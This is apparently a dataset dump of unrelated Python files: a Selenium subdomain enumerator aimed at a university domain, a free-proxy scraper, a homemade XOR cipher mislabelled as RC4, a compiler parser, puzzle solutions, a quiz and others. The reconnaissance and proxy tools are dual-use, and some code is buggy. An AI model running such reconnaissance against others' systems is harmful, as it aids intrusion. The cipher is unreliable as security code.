seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
18617757117 | # modules in standard library
import re
from urllib.parse import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys #需要引入 keys 包
import time
class DnsRecord(object):
def __init__(self, domain):
"""
初始化基本信息
:param target: 要扫描的目标域名
"""
self.domain = domain
self.session = requests.Session()
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Encoding': 'gzip',
}
def get_by_hackertarget(self):
subdomains = []
base_url="https://hackertarget.com/find-dns-host-records/"
#driver = webdriver.Chrome()
driver = webdriver.Firefox() #打开浏览器
#driver.get("http://www.baidu.com")
driver.get(base_url) #打开网页
#通过name方式定位
driver.find_element_by_name("theinput").send_keys(self.domain) #定位输入查询域名
#time.sleep(3)
#driver.maximize_window() #浏览器全屏显示
driver.find_element_by_name("theinput").send_keys(Keys.ENTER) #定位键盘操作,查询
time.sleep(3)
text = driver.find_element_by_id("formResponse").text #包括域名和IP
links = list()
link_regx = re.compile('(.*?)'+self.domain+'') #匹配域名
links = link_regx.findall(text)
try:
for link in links:
if not link.startswith('http'):
link = "http://" + link + self.domain
subdomain = urlparse(link).netloc
if subdomain not in subdomains and subdomain != self.domain:
subdomains.append(subdomain.strip())
except Exception:
pass
return subdomains
driver.quit()
def main(domain):
"""
主函数,只需执行它就能get子域名
:param domain:
:return:
"""
dns_record = DnsRecord(domain)
set1 = dns_record.get_by_hackertarget()
return set1
if __name__ == '__main__':
# 自己在这个文件里尝试好,能获取子域名就提交上来
print(main("hubu.edu.cn")) # 输出hubu.edu.com的子域名 | b1ackc4t/getdomain | module/passive/dns_record.py | dns_record.py | py | 2,542 | python | en | code | 3 | github-code | 36 |
21218564854 | from aocd import lines, submit
ans = 0
test = False
gamma = 0
eps = 0
c = []
if test:
with open("test.txt", "r") as f:
lines = f.readlines()
for line in [l.strip() for l in lines if l]:
for i, sn in enumerate(line):
if len(c) <= i:
c.append([0,0])
n = int(sn)
c[i][n] += 1
for i, cs in enumerate(c):
if cs[1] > cs[0]:
x = 1
else:
x = 0
print(x)
gamma = (gamma | (x << (len(c) - i - 1)))
if cs[1] < cs[0]:
x = 1
else:
x = 0
eps = (eps | (x << (len(c) - i - 1)))
ans = gamma * eps
print(gamma, eps, ans)
submit(ans) | benpm/advent-of-code-2021 | original_solutions/day_03/day_03.py | day_03.py | py | 633 | python | en | code | 0 | github-code | 36 |
43767527613 | # -*- coding: utf-8 -*-
# @Time : 2020/8/21 17:18
# @Author : WuatAnt
# @File : 5-5.py
# @Project : Python数据结构与算法分析
def hash(string, tablesize):
"""
为字符串构建简单的散列函数
:param string: 传入一个字符串
:param tablesize: 散列表的大小
:return: 返回散列值
"""
sum = 0
for pos in range(len(string)):
sum = sum + ord(string[pos]) #ord(): Return the Unicode code point for a one-character string.
return sum % tablesize | WustAnt/Python-Algorithm | Chapter5/5.2/5.2.3/5-5.py | 5-5.py | py | 521 | python | zh | code | 9 | github-code | 36 |
27764760485 | import ply.yacc as yacc
from anytree import Node
from lex import Lexer
class Parser():
# Tokens do processo de análise léxica
tokens = Lexer.tokens
def __init__(self, **kwargs):
self.totalLines = 0
self.result = True
self.lexer = Lexer()
self.parser = yacc.yacc(module=self, **kwargs)
def f_column(self, token, pos):
input = token.lexer.lexdata
line_start = input.rfind('\n', 0, token.lexpos(pos)) + 1
return (token.lexpos(pos) - line_start) + 1
def p_programa(self, p):
'''
programa : lista_declaracoes
'''
p[0] = Node('programa', value = 'programa', children = [p[1]])
def p_lista_declaracoes(self, p):
'''
lista_declaracoes : lista_declaracoes declaracao
| declaracao
'''
if(len(p) == 3):
p[0] = Node('lista_declaracoes', value = 'lista_declaracoes', children = [p[1],p[2]])
else:
p[0] = Node('lista_declaracoes', value = 'lista_declaracoes', children = [p[1]])
def p_declaracao(self, p):
'''
declaracao : declaracao_variaveis
| inicializacao_variaveis
| declaracao_funcao
'''
p[0] = Node('declaracao', value = 'declaracao', children = [p[1]])
def p_declaracao_variaveis(self, p):
'''
declaracao_variaveis : tipo DOIS_PONTOS lista_variaveis
'''
p[0] = Node('declaracao_variaveis', value = 'declaracao_variaveis', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
def p_inicializacao_variaveis(self, p):
'''
inicializacao_variaveis : atribuicao
'''
p[0] = Node('inicializacao_variaveis', value = 'inicializacao_variaveis', children = [p[1]])
def p_lista_variaveis(self, p):
'''
lista_variaveis : lista_variaveis VIRGULA var
| var
'''
if(len(p) == 4):
p[0] = Node('lista_variaveis', value = 'lista_variaveis', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
else:
p[0] = Node('lista_variaveis', value = 'lista_variaveis', children = [p[1]])
def p_var(self, p):
'''
var : ID
| ID indice
'''
if(len(p) == 3):
p[0] = Node('var', value = 'var', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2]
])
else:
p[0] = Node('var', value = 'var', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_indice(self, p):
'''
indice : indice ABRE_COLCHETE expressao FECHA_COLCHETE
| ABRE_COLCHETE expressao FECHA_COLCHETE
'''
if(len(p) == 5):
p[0] = Node('indice', value = 'indice', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
else:
p[0] = Node('indice', value = 'indice', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
])
def p_tipo(self, p):
'''
tipo : INTEIRO
| FLUTUANTE
'''
p[0] = Node('tipo', value = 'tipo', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_declaracao_funcao(self, p):
'''declaracao_funcao : tipo cabecalho
| cabecalho'''
if(len(p) == 3):
p[0] = Node('declaracao_funcao', value = 'declaracao_funcao', children = [
p[1],
p[2]
])
else:
p[0] = Node('declaracao_funcao', value = 'declaracao_funcao', children = [p[1]])
def p_cabecalho(self, p):
'''cabecalho : ID ABRE_PARENTESE lista_parametros FECHA_PARENTESE corpo FIM'''
p[0] = Node('cabecalho', value = 'cabecalho', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4)),
p[5]
])
def p_lista_parametros(self, p):
'''
lista_parametros : lista_parametros VIRGULA parametro
| parametro
| vazio
'''
if(len(p) == 4):
p[0] = Node('lista_parametros', value = 'lista_parametros', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
else:
if(p[1] is not None):
p[0] = Node('lista_parametros', value = 'lista_parametros', children = [p[1]])
else:
p[0] = Node('lista_parametros', value = 'lista_parametros')
def p_parametro(self, p):
'''
parametro : tipo DOIS_PONTOS ID
| parametro ABRE_COLCHETE FECHA_COLCHETE
'''
p[0] = Node('parametro', value = 'parametro', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
])
def p_corpo(self, p):
'''
corpo : corpo acao
| vazio
'''
if(len(p) == 3):
p[0] = Node('corpo', value = 'corpo', children = [
p[1],
p[2]
])
else:
p[0] = Node('corpo', value = 'corpo')
def p_acao(self, p):
'''
acao : expressao
| declaracao_variaveis
| se
| repita
| leia
| escreva
| retorna
'''
p[0] = Node('acao', value = 'acao', children = [p[1]])
def p_se(self, p):
'''
se : SE expressao ENTAO corpo FIM
| SE expressao ENTAO corpo SENAO corpo FIM
'''
if(len(p) == 6):
p[0] = Node('condicional', value = 'condicional', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
p[4],
Node(str(p[5]), value = str(p[5]), line = (p.lineno(5) - (self.totalLines - 1)), column = self.f_column(p, 5))
])
else:
p[0] = Node('condicional', value = 'condicional', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
p[4],
Node(str(p[5]), value = str(p[5]), line = (p.lineno(5) - (self.totalLines - 1)), column = self.f_column(p, 5)),
p[6],
Node(str(p[7]), value = str(p[7]), line = (p.lineno(7) - (self.totalLines - 1)), column = self.f_column(p, 7))
])
def p_repita(self, p):
'''
repita : REPITA corpo ATE expressao
'''
p[0] = Node('repita', value = 'repita', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
p[4]
])
def p_atribuicao(self, p):
'''
atribuicao : var ATRIBUICAO expressao
'''
p[0] = Node('atribuicao', value = 'atribuicao', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
def p_leia(self, p):
'''
leia : LEIA ABRE_PARENTESE var FECHA_PARENTESE
'''
p[0] = Node('leia', value = 'leia', children = [
Node(str(p[1]), value = str(p[2]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
def p_escreva(self, p):
'''
escreva : ESCREVA ABRE_PARENTESE expressao FECHA_PARENTESE
'''
p[0] = Node('escreva', value = 'escreva', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
def p_retorna(self, p):
'''
retorna : RETORNA ABRE_PARENTESE expressao FECHA_PARENTESE
'''
p[0] = Node('retorna', value = 'retorna', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
def p_expressao(self, p):
'''
expressao : expressao_logica
| atribuicao
'''
p[0] = Node('expressao', value = 'expressao', children = [p[1]])
def p_expressao_logica(self, p):
'''
expressao_logica : expressao_simples
| expressao_logica operador_logico expressao_simples
'''
if(len(p) == 4):
p[0] = Node('expressao_logica', value = 'expressao_logica', children = [
p[1],
p[2],
p[3]
])
else:
p[0] = Node('expressao_logica', value = 'expressao_logica', children = [p[1]])
def p_expressao_simples(self, p):
'''
expressao_simples : expressao_aditiva
| expressao_simples operador_relacional expressao_aditiva
'''
if(len(p) == 4):
p[0] = Node('expressao_simples', value = 'expressao_simples', children = [
p[1],
p[2],
p[3]
])
else:
p[0] = Node('expressao_simples', value = 'expressao_simples', children = [p[1]])
def p_expressao_aditiva(self, p):
'''
expressao_aditiva : expressao_multiplicativa
| expressao_aditiva operador_soma expressao_multiplicativa
'''
if(len(p) == 4):
p[0] = Node('expressao_aditiva', value = 'expressao_aditiva', children = [
p[1],
p[2],
p[3]
])
else:
p[0] = Node('expressao_aditiva', value = 'expressao_aditiva', children = [p[1]])
def p_expressao_multiplicativa(self, p):
'''
expressao_multiplicativa : expressao_unaria
| expressao_multiplicativa operador_multiplicacao expressao_unaria
'''
if(len(p) == 4):
p[0] = Node('expressao_multiplicativa', value = 'expressao_multiplicativa', children = [
p[1],
p[2],
p[3]
])
else:
p[0] = Node('expressao_multiplicativa', value = 'expressao_multiplicativa', children = [p[1]])
def p_expressao_unaria(self, p):
'''
expressao_unaria : fator
| operador_soma fator
| operador_negacao fator
'''
if(len(p) == 3):
p[0] = Node('expressao_unaria', value = 'expressao_unitaria', children = [
p[1],
p[2]
])
else:
p[0] = Node('expressao_unaria', value = 'expressao_unitaria', children = [p[1]])
def p_operador_relacional(self, p):
'''
operador_relacional : MENOR
| MAIOR
| IGUAL
| DIFERENTE
| MENOR_IGUAL
| MAIOR_IGUAL
'''
p[0] = Node('operador_relacional', value = 'operador_relacional', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_operador_soma(self, p):
'''
operador_soma : MAIS
| MENOS
'''
p[0] = Node('operador_soma', value = 'operador_soma', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_operador_logico(self, p):
'''
operador_logico : E_LOGICO
| OU_LOGICO
'''
p[0] = Node('operador_logico', value = 'operador_logico', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_operador_negacao(self, p):
'''
operador_negacao : NEGACAO
'''
p[0] = Node('operador_negacao', value = 'operador_negacao', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_operador_multiplicacao(self, p):
'''
operador_multiplicacao : MULTIPLICACAO
| DIVISAO
'''
p[0] = Node('operador_multiplicacao', value = 'operador_multiplicacao', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_fator(self, p):
'''
fator : ABRE_PARENTESE expressao FECHA_PARENTESE
| var
| chamada_funcao
| numero
'''
if(len(p) == 4):
p[0] = Node('fator', value = 'fator', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
])
else:
p[0] = Node('fator', value = 'fator', children = [p[1]])
def p_numero(self, p):
'''
numero : NUM_INTEIRO
| NUM_PONTO_FLUTUANTE
| NUM_NOTACAO_CIENTIFICA
'''
p[0] = Node('numero', value = 'numero', children = [
Node(str(p[1]), value = p[1], line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_chamada_funcao(self, p):
'''
chamada_funcao : ID ABRE_PARENTESE lista_argumentos FECHA_PARENTESE
'''
p[0] = Node('chamada_funcao', value = 'chamada_funcao', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
def p_lista_argumentos(self, p):
'''
lista_argumentos : lista_argumentos VIRGULA expressao
| expressao
| vazio
'''
if(len(p) == 4):
p[0] = Node('lista_argumentos', value = 'lista_argumentos', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
else:
if(p[1] is not None):
p[0] = Node('lista_argumentos', value = 'lista_argumentos', children = [p[1]])
else:
p[0] = Node('lista_argumentos', value = 'lista_argumentos')
def p_vazio(self, p):
'''
vazio :
'''
pass
def p_error(self, p):
self.result = False
if p:
print('Sintaxe Inválida do token \'' + str(p.value) + '\' em ' + str(p.lineno) + ':' + str(self.lexer.f_column(p)))
else:
print('Sintaxe Inválida da saída')
def syntactic(self, codeFile, numberOfLines):
self.totalLines = numberOfLines
self.tree = self.parser.parse(codeFile, tracking = True)
return self.tree, self.result | alanrps/Compilador_Linguagem_Tpp | parser.py | parser.py | py | 16,635 | python | pt | code | 0 | github-code | 36 |
35580246140 | import sys
import datetime
import os
class StreamCipherUtil:
def __init__(self, input_file, output_file, key):
self.key = key
self.output_file = output_file
self.input_file = input_file
self.exec_time = None
self.text_len = 0
self.bit_stream = self._pm_rand()
self.bit_len = 8
self.file_text_len = os.stat(self.input_file).st_size
@staticmethod
def progress_bar(count, total, suffix=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', suffix))
sys.stdout.flush()
def _pm_rand(self):
IA = 16807
IM = 2147483647
a = (2 ** 31 - 1) // 2
prev_value = IA * self.hash_key() % IM
next_value = 0
while True:
next_value = IA * prev_value % IM
prev_value = next_value
if next_value < a + 1:
yield '0'
else:
yield '1'
def gen_custom_prng_bit_seq(self):
bit_seq = ""
for index in range(self.bit_len):
bit_seq += next(self.bit_stream)
return int(bit_seq, 2)
def crypt_stream(self, text_stream):
start = datetime.datetime.now()
for ch in text_stream:
yield chr(ord(ch) ^ self.gen_custom_prng_bit_seq())
stop = datetime.datetime.now()
self.exec_time = stop - start
def hash_key(self):
import hashlib
return int(hashlib.sha256(str(self.key).encode('utf-16')).hexdigest(), 16) % (2 ** 31 - 1)
def read_from_file(self):
text = ""
with open(self.input_file, 'r', newline='') as f:
text = f.read()
f.close()
return text
def write_to_file(self, text):
with open(self.output_file, 'w', newline='') as f:
for index, ch in enumerate(text):
f.write(ch)
self.progress_bar(index, self.file_text_len)
self.text_len += 1
f.close()
if __name__ == '__main__':
print("RC4 Encryption/Decryption utility.\n")
while True:
try:
mode = int(input("Choose mode: \n1. Encryption\n2. Decryption\nEnter mode: "))
input_filename = input("Enter input filename: ")
output_filename = input("Enter output filename: ")
key = input("Enter key [0-9a-zA-Zа-яА-Я]: ")
s = StreamCipherUtil(key=[ord(ch) for ch in key], input_file=input_filename,
output_file=output_filename)
data_stream = s.read_from_file()
new_data_stream = None
if mode is 1:
new_data_stream = s.crypt_stream(data_stream)
elif mode is 2:
new_data_stream = s.crypt_stream(data_stream)
s.write_to_file(new_data_stream)
print("\nTime {0} chars/ms".format((s.exec_time.seconds*10**6+s.exec_time.microseconds)/s.text_len))
except KeyboardInterrupt:
print("\nQuit utility.Bye!\n")
break
except ValueError as e:
print("\nError occured! {0}\n".format(e.args)) | Kamkas/Stream-cipher | lab2.py | lab2.py | py | 3,322 | python | en | code | 1 | github-code | 36 |
29393168292 | class Solution:
def numRollsToTarget(self, d: int, f: int, target: int) -> int:
dp = {}
def recursion(dices, t):
if dices == 0 and t == 0:
return 1
elif dices == 0 and t != 0:
return 0
if (dices, t) in dp:
return dp[(dices, t)]
s = 0
for i in range(max(t - f, 0), t):
s += recursion(dices - 1, i)
dp[(dices, t)] = s
return s
return recursion(d, target) % (10 ** 9 + 7) | AnotherPianist/LeetCode | number-of-dice-rolls-with-target-sum/number-of-dice-rolls-with-target-sum.py | number-of-dice-rolls-with-target-sum.py | py | 563 | python | en | code | 1 | github-code | 36 |
37403961227 | from regression_tests import *
class TestPlain(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose',
input='file-32bit.ex_'
)
def test_fileinfo_version_string_present(self):
self.assertRegex(self.fileinfo.output, r'RetDec Fileinfo version : RetDec .* built on .*')
class TestJson(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose --json',
input='file-32bit.ex_'
)
def test_fileinfo_version_info_present(self):
self.assertTrue(self.fileinfo.output['fileinfoVersion']['commitHash'])
self.assertTrue(self.fileinfo.output['fileinfoVersion']['versionTag'])
self.assertTrue(self.fileinfo.output['fileinfoVersion']['buildDate']) | avast/retdec-regression-tests | tools/fileinfo/features/fileinfo-version/test.py | test.py | py | 754 | python | en | code | 11 | github-code | 36 |
10415944432 |
print("Welcome to the quiz")
print("type 'stop' to exit\n")
run = True
question = 1
while run:
if question == 1:
answer = input("\nIs cheetah the fastest animal in the world?Yes or No?(Land, water, air)\n:")
if answer == "Yes":
print("\nIt is false.The peregrine falcon is the fastest animal")
question = 2
elif answer == "No":
print("\nYou are correct.\n")
print("Next question")
question = 2
elif answer == "stop":
print("\n\nThanks for attempting, Bye.")
run = False
else:
print("\nError, please try again.")
continue
elif question == 2:
answer = input("\nWhat is the scientific name of Pig?\n:")
if answer == "Sus" or "sus":
print("\nYou are correct")
print("\nNext question")
question = 3
run = False
elif answer == "stop":
print("\nThanks for attempting. Bye")
run = False
else:
print("\nYou are wrong, please try again")
continue
elif question == 3:
answer = input("\nWhich country produces the most coffee?")
if answer == "Brazil":
print("\nYou are correct")
print("\nNext question")
question = 4
run = False
elif answer == "stop":
print("\nThanks for attempting. Bye")
run = False
else:
print("\nYou are wrong, please try again")
continue
elif question == 4:
answer = input("\nWhat is the capital of Switzerland?\n:")
if answer == "Bern":
print("\nYou are correct")
print("\nNext question")
question = 5
run = False
elif answer == "stop":
print("\nThanks for attempting. Bye")
run = False
else:
print("\nYou are wrong, please try again")
continue
if question == 5:
answer = input("\nWhich country produces the most coffee?")
if answer == "Brazil":
print("\nYou are correct")
print("\nNext question")
question = 6
run = False
elif answer == "stop":
print("\nThanks for attempting. Bye")
run = False
else:
print("\nYou are wrong, please try again")
continue
if question == 6:
answer = input("\nWhich is the fastest car in the world?(Exact name)?")
if answer == "Bugatti Chiron Super Sport 300+":
print("\nYou are correct")
print("\nNext question")
run = False
elif answer == "stop":
print("\nThanks for attempting. Bye")
run = False
else:
print("\nYou are wrong, please try again")
continue
| ojasprogramer/python | Tanmay's quiz.py | Tanmay's quiz.py | py | 2,906 | python | en | code | 0 | github-code | 36 |
1777450651 | import spacy
# Load the English language model
nlp = spacy.load('en_core_web_sm')
# Load the scraped text from the file
with open('website_text.txt', 'r') as f:
text = f.read()
# Process the text with spaCy
doc = nlp(text)
# Extract the sentences
sentences = [sent.text.strip() for sent in doc.sents]
print(sentences)
| anupshrestha7171/FinalTaskOnMentorFriends | Qn2.py | Qn2.py | py | 341 | python | en | code | 0 | github-code | 36 |
24340323309 | from PySide2.QtWidgets import QApplication
from PySide2.QtUiTools import QUiLoader
from PySide2.QtCore import QFile
import DCT,DFT,histogram_equalization,gray,nose,buguize,duishu,gamma,test_fenge,test_kuang,test_face3,junzhi
class Stats:
def __init__(self):
qufile_stats=QFile('GUI1.ui')
qufile_stats.open(QFile.ReadOnly)
qufile_stats.close()
self.ui = QUiLoader().load(qufile_stats)
self.ui.runButton.clicked.connect(self.run)
def path(self):
from PySide2.QtWidgets import QFileDialog
filePath, _ = QFileDialog.getOpenFileName(
self.ui, # 父窗口对象
"选择你的图片", # 标题
r"d:\\data", # 起始目录
"图片类型 (*.png *.jpg *.bmp)" # 选择类型过滤项,过滤内容在括号中
)
return (filePath)
def run(self):
if self.ui.DCTButton.isChecked():
DCT.DCT1(self.path())
if self.ui.DFTButton.isChecked():
DFT.DFT1(self.path())
if self.ui.zhifangButton.isChecked():
histogram_equalization.his_eq(self.path())
if self.ui.noseButton.isChecked():
nose.addnoise(self.path())
if self.ui.grayButton.isChecked():
gray.gray1(self.path())
if self.ui.buguize.isChecked():
buguize.buguize(self.path())
if self.ui.duishu.isChecked():
buguize.buguize(self.path())
if self.ui.gamma.isChecked():
gamma.gamma(self.path())
if self.ui.junzhi.isChecked():
junzhi.junzhi(self.path())
if self.ui.face.isChecked():
test_face3.face(self.path())
if self.ui.fenge.isChecked():
test_fenge.fenge(self.path())
if self.ui.kuang.isChecked():
test_kuang.kuang(self.path())
app = QApplication([])
stats = Stats()
stats.ui.show()
app.exec_() | lightning-skyz/test1 | GUI.py | GUI.py | py | 1,906 | python | en | code | 0 | github-code | 36 |
37695484761 | from random import randint
from concurrent.futures import ThreadPoolExecutor as pool
import random
import os
import subprocess
import re
import requests
import json
import time
class Prox:
def __init__(self):
self.alive=[]
self.unfiltered=[]
self.get_proxy('https://free-proxy-list.net')
self.get_proxy('https://www.us-proxy.org/')
self.get_proxy('https://www.sslproxies.org/')
self.get_proxy('http://spys.me/proxy.txt')
self.unfiltered=list(set(self.unfiltered))
print('Total valid proxies>>>')
print(len(self.unfiltered))
time.sleep(3)
def get_proxy(self,url):
pl=[]
try:
res=requests.get(url)
html=res.content.decode()
try:
pl=re.findall(r'<td>(\d+\.\d+\.\d+\.\d+)</td><td>(\d+)</td>',html)
if not len(pl):
print('now collecting>>>')
time.sleep(1)
pl=re.findall(r'(\d+\.\d+\.\d+\.\d+):(\d+)',html)
try:
pl=[x[0]+':'+x[1] for x in pl]
except:
print('no proxy found')
self.unfiltered += pl
print(pl)
except:
print('line 40')
print(len(self.unfiltered))
except Exception as e:
print('ERROR AT GET PROXY')
print(str(e))
def collect(self):
with pool(max_workers=1000) as exc:
exc.map(self.check_proxy,self.unfiltered)
print(len(set(self.alive)))
def check_proxy(self,x):
for _ in range(3):
try:
#print('TRYING PROXY: '+x)
proxies= {
'http':'http://'+ x,
'https':'https://'+ x,
}
r = requests.get('https://www.google.com/humans.txt',
timeout=3,
proxies = proxies
)
if r.status_code == 200:
print(x)
self.alive.append(x)
return
except:
pass
print('dropping '+x)
#print(f'TRYING ANOTHER PROXY....PROXY NO.{i+1}')
if __name__=='__main__':
r=Prox()
r.collect()
with open('fresh_proxy.txt','a') as f:
for i in r.alive:
f.write(i+'\n') | adnangif/getproxy | getproxy.py | getproxy.py | py | 2,645 | python | en | code | 0 | github-code | 36 |
27969273118 | import numpy as np
from scipy import optimize
class KernelSVC:
def __init__(self, C, kernel, epsilon=1e-3):
self.type = 'non-linear'
self.C = C
self.kernel = kernel
self.alpha = None
self.support = None
self.epsilon = epsilon
self.norm_f = None
self.Nfeval = 0
def fit(self, X, y):
y = 2 * (y - 0.5)
N = len(y)
self.support = X
M = self.kernel(X, X)
# Lagrange dual problem
def loss(alpha):
Y = np.diag(y)
AY = Y @ alpha
return -np.sum(alpha) + AY.T @ (M @ AY) / 2
# Partial derivate of Ld on alpha
def grad_loss(alpha):
Y = np.diag(y)
AY = Y @ alpha
return -np.ones(len(alpha)) + Y @ (M @ AY)
fun_eq = lambda alpha: np.sum(alpha * y)
jac_eq = lambda alpha: y
fun_ineq1 = lambda alpha: self.C - alpha
jac_ineq1 = lambda alpha: -np.identity(len(alpha))
fun_ineq2 = lambda alpha: alpha
jac_ineq2 = lambda alpha: np.identity(len(alpha))
constraints = ({'type': 'eq', 'fun': fun_eq, 'jac': jac_eq},
{'type': 'ineq', 'fun': fun_ineq1, 'jac': jac_ineq1},
{'type': 'ineq', 'fun': fun_ineq2, 'jac': jac_ineq2})
optRes = optimize.minimize(fun=lambda alpha: loss(alpha),
x0=np.ones(N),
method='SLSQP',
jac=lambda alpha: grad_loss(alpha),
constraints=constraints,
callback=self.callbackF,
options={"maxiter":50, 'disp':True})
self.alpha = optRes.x
## Assign the required attributes
Y = np.diag(y)
AY = Y @ self.alpha
self.margin_points = [X[p] for p in np.where((self.alpha > self.epsilon) & (self.alpha < self.C - self.epsilon))[0]]
self.b = np.mean(y[np.where((self.alpha > self.epsilon) & (self.alpha < self.C - self.epsilon))[0]]
- self.kernel(self.margin_points,X) @ AY)
self.norm_f = np.sqrt(AY.T @ M @ AY)
self.alpha = AY
### Implementation of the separting function $f$
def separating_function(self, x):
return self.kernel(x, self.support) @ self.alpha
def predict(self, X):
d = self.separating_function(X)
# return 2 * (d + self.b > 0) - 1
return 1 / (1 + np.exp(-(d+self.b)))
def callbackF(self, Xi):
print(self.Nfeval)
self.Nfeval += 1
| Zero-4869/Kernel-methods | classifier.py | classifier.py | py | 2,631 | python | en | code | 0 | github-code | 36 |
7054738322 | """
变量其他写法
删除变量
练习:exercise04
"""
# 写法1:变量名 = 数据
data01 = "悟空"
# print(data01)
# 写法2:变量名1, 变量名2 = 数据1, 数据2
data02, data03 = "八戒", "唐僧"
print(data02) # "八戒"
print(data03) # "唐僧"
# 写法3:变量名1 = 变量名2 = 数据
data04 = data05 = "沙僧"
print(data05)
data01 = "大圣"
print(data01)
